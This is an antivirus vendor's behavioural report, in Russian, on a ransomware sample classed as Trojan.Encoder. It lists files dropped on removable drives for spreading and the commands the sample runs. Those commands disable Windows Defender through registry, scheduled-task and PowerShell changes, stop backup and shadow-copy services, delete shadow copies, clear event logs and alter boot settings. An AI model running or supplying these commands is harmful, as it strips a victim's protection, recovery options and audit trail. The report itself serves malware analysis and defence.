Техническая информация
Для обеспечения автозапуска и распространения
Создает следующие файлы на съемном носителе
- <Имя диска съемного носителя>:\xzx3fbo0xmb9bmee4avlwpzpxxltxk4xtdwfqtbf5_n_.key.fayg2
- <Имя диска съемного носителя>:\210252809.jpeg
- <Имя диска съемного носителя>:\1189.jpeg
- <Имя диска съемного носителя>:\2013_finalsummaryforweb.xlsx
- <Имя диска съемного носителя>:\1sm_price.zip
- <Имя диска съемного носителя>:\2015-02-patients-topic-work-related-asthma-jobs.pdf
- <Имя диска съемного носителя>:\20140114.rdf
- <Имя диска съемного носителя>:\2.jpg
- <Имя диска съемного носителя>:\168.jpg
- <Имя диска съемного носителя>:\2015-02-worms-nanoparticle-toxicity.pdf
- <Имя диска съемного носителя>:\2013_smccc_competition_points_jul2013.xlsx
- <Имя диска съемного носителя>:\51.mp4
- <Имя диска съемного носителя>:\babyboymaintonotesbackground_pal.wmv
- <Имя диска съемного носителя>:\babyboymaintoscenesbackground.wmv
- <Имя диска съемного носителя>:\babyboymaintoscenesbackground_pal.wmv
Вредоносные функции
Для затруднения выявления своего присутствия в системе
блокирует запуск следующих системных утилит:
- Системный антивирус (Защитник Windows)
блокирует:
- Компонент восстановления системы (SR)
удаляет теневые копии разделов.
Запускает на исполнение
- '<SYSTEM32>\net.exe' stop "NetMsmqActivator" /y
- '<SYSTEM32>\net.exe' stop "SamSs" /y
- '<SYSTEM32>\net.exe' stop "SDRSVC" /y
- '<SYSTEM32>\net.exe' stop "SstpSvc" /y
- '<SYSTEM32>\net.exe' stop "UI0Detect" /y
- '<SYSTEM32>\net.exe' stop "VSS" /y
- '<SYSTEM32>\net.exe' stop "wbengine" /y
- '<SYSTEM32>\net.exe' stop "WebClient" /y
Изменения в файловой системе
Создает следующие файлы
- C:\xzx3fbo0xmb9bmee4avlwpzpxxltxk4xtdwfqtbf5_n_.key.fayg2
- D:\xzx3fbo0xmb9bmee4avlwpzpxxltxk4xtdwfqtbf5_n_.key.fayg2
- %TEMP%\mpcmdrun.log
Подменяет следующие файлы
- <Имя диска съемного носителя>:\2.jpg
- <Имя диска съемного носителя>:\168.jpg
- <Имя диска съемного носителя>:\2013_smccc_competition_points_jul2013.xlsx
- <Имя диска съемного носителя>:\20140114.rdf
- <Имя диска съемного носителя>:\210252809.jpeg
Изменяет множество файлов пользовательских данных (Trojan.Encoder).
Другое
Запускает на исполнение
- '<SYSTEM32>\net1.exe' stop "NetMsmqActivator" /y
- '<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
- '<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
- '<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
- '<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
- '<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
- '<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
- '<SYSTEM32>\reg.exe' delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
- '<SYSTEM32>\reg.exe' delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
- '<SYSTEM32>\reg.exe' delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
- '<SYSTEM32>\reg.exe' delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
- '<SYSTEM32>\reg.exe' delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
- '<SYSTEM32>\reg.exe' delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
- '<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
- '<SYSTEM32>\cmd.exe' /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
- '<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
- '<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
- '<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
- '<SYSTEM32>\wevtutil.exe' cl system
- '<SYSTEM32>\wevtutil.exe' cl security
- '<SYSTEM32>\wevtutil.exe' cl application
- '<SYSTEM32>\wbem\wmic.exe' SHADOWCOPY /nointeractive
- '<SYSTEM32>\bcdedit.exe' /set {default} bootstatuspolicy ignoreallfailures
- '<SYSTEM32>\cmd.exe' /c "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
- '%ProgramFiles%\windows defender\mpcmdrun.exe' -RemoveDefinitions -All
- '<SYSTEM32>\cmd.exe' /c powershell Set-MpPreference -DisableIOAVProtection $true
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableIOAVProtection $true
- '<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
- '<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
- '<SYSTEM32>\sc.exe' config "VSS" start= disabled
- '<SYSTEM32>\net1.exe' stop "SamSs" /y
- '<SYSTEM32>\net1.exe' stop "SDRSVC" /y
- '<SYSTEM32>\net1.exe' stop "SstpSvc" /y
- '<SYSTEM32>\net1.exe' stop "UI0Detect" /y
- '<SYSTEM32>\net1.exe' stop "VSS" /y
- '<SYSTEM32>\net1.exe' stop "wbengine" /y
- '<SYSTEM32>\net1.exe' stop "WebClient" /y
- '<SYSTEM32>\sc.exe' config "NetMsmqActivator" start= disabled
- '<SYSTEM32>\sc.exe' config "SamSs" start= disabled
- '<SYSTEM32>\sc.exe' config "SDRSVC" start= disabled
- '<SYSTEM32>\sc.exe' config "SstpSvc" start= disabled
- '<SYSTEM32>\sc.exe' config "UI0Detect" start= disabled
- '<SYSTEM32>\sc.exe' config "wbengine" start= disabled
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\sc.exe' config "WebClient" start= disabled
- '<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
- '<SYSTEM32>\reg.exe' delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableRealtimeMonitoring $true
